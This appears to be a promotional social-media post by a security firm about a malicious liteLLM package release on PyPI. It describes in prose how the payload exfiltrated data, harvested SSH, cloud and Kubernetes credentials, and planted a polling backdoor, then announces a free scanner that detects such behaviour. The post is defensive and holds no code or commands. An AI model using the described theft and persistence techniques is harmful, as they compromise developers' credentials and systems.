The March 24th #liteLLM compromise isn’t just another vulnerable package; it is a masterclass in why relying solely on CVE databases is a fundamentally broken security posture.
For those catching up, the threat group TeamPCP compromised the Trivy GitHub Action to steal PyPI publisher credentials, publishing malicious versions (1.82.7 and 1.82.8) of the liteLLM package. If you ran pip install during the exposure window, the payload executed in three layers:
- Exfiltration: AES-256-CBC encrypted archive sent to a remote C2 server.
- Credential Harvesting: Aggressive targeting of ~/.ssh, AWS/GCP/Azure credentials, Kubernetes configs, and API keys.
- Persistence: Establishing a sysmon.py backdoor that polls the C2 endpoint every 50 minutes.
Traditional vulnerability scanners missed this entirely because no CVE existed. They look for known bad patterns, not malicious behavior — let alone malicious intent.
When the scope of this attack became clear, our engineering team @Threat Point mobilized instantly. In the face of a critical ecosystem exploit, we knew we had to ship a practical, zero-day defense tool to developers globally. We shipped v0.1.0 in <24 hours. Expect some false positives. It’s a flashlight in a dark room for immediate visibility while we actively iterate to reduce noise.
To give teams an immediate way to triage their environments, we built and open-sourced: who-touched-my-packages (wtmp).
Here is what the tool does:
- Dependency Graphing: Uses Node.js and Python tools to generate a full dependency graph (ensure your dependencies are downloaded as usual prior to scanning).
- Local CVE Cross-Referencing: Downloads two sources of vulnerabilities directly to your device (GitHub Advisories and Google’s OSV) and matches your dependency versions against them.
- Active Behavioral Scanning (Zero-Day Defense): You can optionally pass an Anthropic, Open AI, or Open Router API key via an environment variable. If an API key is provided, an agentic AI process with the latest LangGraph tooling will deeply scan every dependency.
- Targeted Threat Detection: The agentic LLM process not only actively hunts for the exact zero-day mechanisms used in yesterday’s attack, but it more broadly identifies dozens of threat indicator patterns common in supply chain compromises. This includes data exfiltration, credential harvesting, crypto wallet theft, environment scanning, code obfuscation, persistence, data packaging, and CI/CD poisoning.
We are making this completely public and free to use.
Install globally & scan your project: https://point-wild.github.io/who-touched-my-packages/#quick-start
If your security tooling can’t analyze what a package is actually doing during execution, you are flying blind. Run your scans, rotate your keys, and secure the ecosystem.